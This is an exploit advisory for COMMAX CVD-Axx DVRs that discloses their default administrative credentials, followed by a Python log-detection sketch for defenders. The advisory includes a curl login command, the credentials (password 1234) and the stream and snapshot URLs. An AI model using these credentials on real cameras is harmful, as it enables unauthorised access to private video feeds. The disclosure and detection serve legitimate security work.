## https://sploitus.com/exploit?id=PACKETSTORM:163853
COMMAX CVD-Axx DVR 5.1.4 Weak Default Credentials Stream Disclosure  
  
  
Vendor: COMMAX Co., Ltd.  
Product web page: https://www.commax.com  
Affected version: CVD-AH04 DVR 4.4.1  
CVD-AF04 DVR 4.4.1  
CVD-AH16 DVR 5.1.4  
CVD-AF16 DVR 4.4.1  
CVD-AF08 DVR 5.1.2  
CVD-AH08 DVR 5.1.2  
  
Summary: COMMAX offers a wide range of proven AHD CCTV systems to meet customer  
needs and convenience in single or multi-family homes.  
  
Desc: The web control panel uses a weak set of default administrative credentials that  
can be easily guessed in remote password attacks, disclosing the RTSP stream.  
  
Tested on: Boa/0.94.14rc19  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2021-5667  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5667.php  
  
  
02.08.2021  
  
--  
  
  
Login:  
$ curl -X POST http://192.168.1.2/cgi-bin/websetup.cgi -d="passkey=1234"  
HTTP/1.1 200 OK  
Date: Mon, 16 Aug 2021 01:04:52 GMT  
Server: Boa/0.94.14rc19  
Accept-Ranges: bytes  
Connection: close  
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">  
  
IE (ActiveX) web player:  
http://192.168.1.2/web_viewer2.html  
  
Snapshots:  
http://192.168.1.2/images/snapshot-01.jpg  
http://192.168.1.2/images/snapshot-02.jpg  
http://192.168.1.2/images/snapshot-nn.jpg  
  
  
Creds:  
Users: ADMIN,USER1,USER2,USER3  
Password: 1234
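
Detection sketch for defenders, added here as an example and not part of the original advisory or any vendor code: it flags repeated posts to the login CGI and viewer/snapshot requests from outside a management network. Assumptions: requests to the DVR are logged in Common Log Format by a proxy or gateway in front of it; the names audit, _clf and SAMPLE, the 192.168.1.0/24 management range and the threshold are hypothetical.

```python
import ipaddress
import re
from collections import Counter

# Paths come from the advisory; the log format and thresholds are assumptions.
LOGIN_PATH = "/cgi-bin/websetup.cgi"
VIEW_RE = re.compile(r"^/(web_viewer2\.html|images/snapshot-\d+\.jpg)$")
# Assumed: a proxy or gateway in front of the DVR logs in Common Log Format.
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" \d{3} \S+')

def audit(lines, mgmt_nets, max_logins=3):
    """Return sorted (source_ip, reason) findings for requests to the DVR."""
    nets = [ipaddress.ip_network(n) for n in mgmt_nets]
    logins, findings = Counter(), set()
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue  # not a CLF request line
        src, method, url = m.groups()
        try:
            addr = ipaddress.ip_address(src)
        except ValueError:
            continue  # client logged as a hostname; out of scope here
        trusted = any(addr in n for n in nets)
        path = url.split("?", 1)[0]
        if method == "POST" and path == LOGIN_PATH:
            logins[src] += 1
            if not trusted:
                findings.add((src, "login from untrusted network"))
        elif VIEW_RE.match(path) and not trusted:
            findings.add((src, "stream/snapshot access from untrusted network"))
    # Many posts to the login CGI from one source suggest password guessing.
    findings.update((s, "repeated login attempts")
                    for s, n in logins.items() if n > max_logins)
    return sorted(findings)

def _clf(src, method, path):
    """Build one constructed CLF line (sample data, not a real capture)."""
    return f'{src} - - [16/Aug/2021:01:05:00 +0000] "{method} {path} HTTP/1.1" 200 512'

SAMPLE = ([_clf("192.168.1.10", "POST", LOGIN_PATH)]
          + [_clf("203.0.113.7", "POST", LOGIN_PATH)] * 4
          + [_clf("203.0.113.7", "GET", "/images/snapshot-01.jpg"),
             _clf("198.51.100.9", "GET", "/web_viewer2.html"),
             _clf("192.168.1.10", "GET", "/images/snapshot-02.jpg")])

if __name__ == "__main__":
    for finding in audit(SAMPLE, ["192.168.1.0/24"]):
        print(*finding, sep="  ")
```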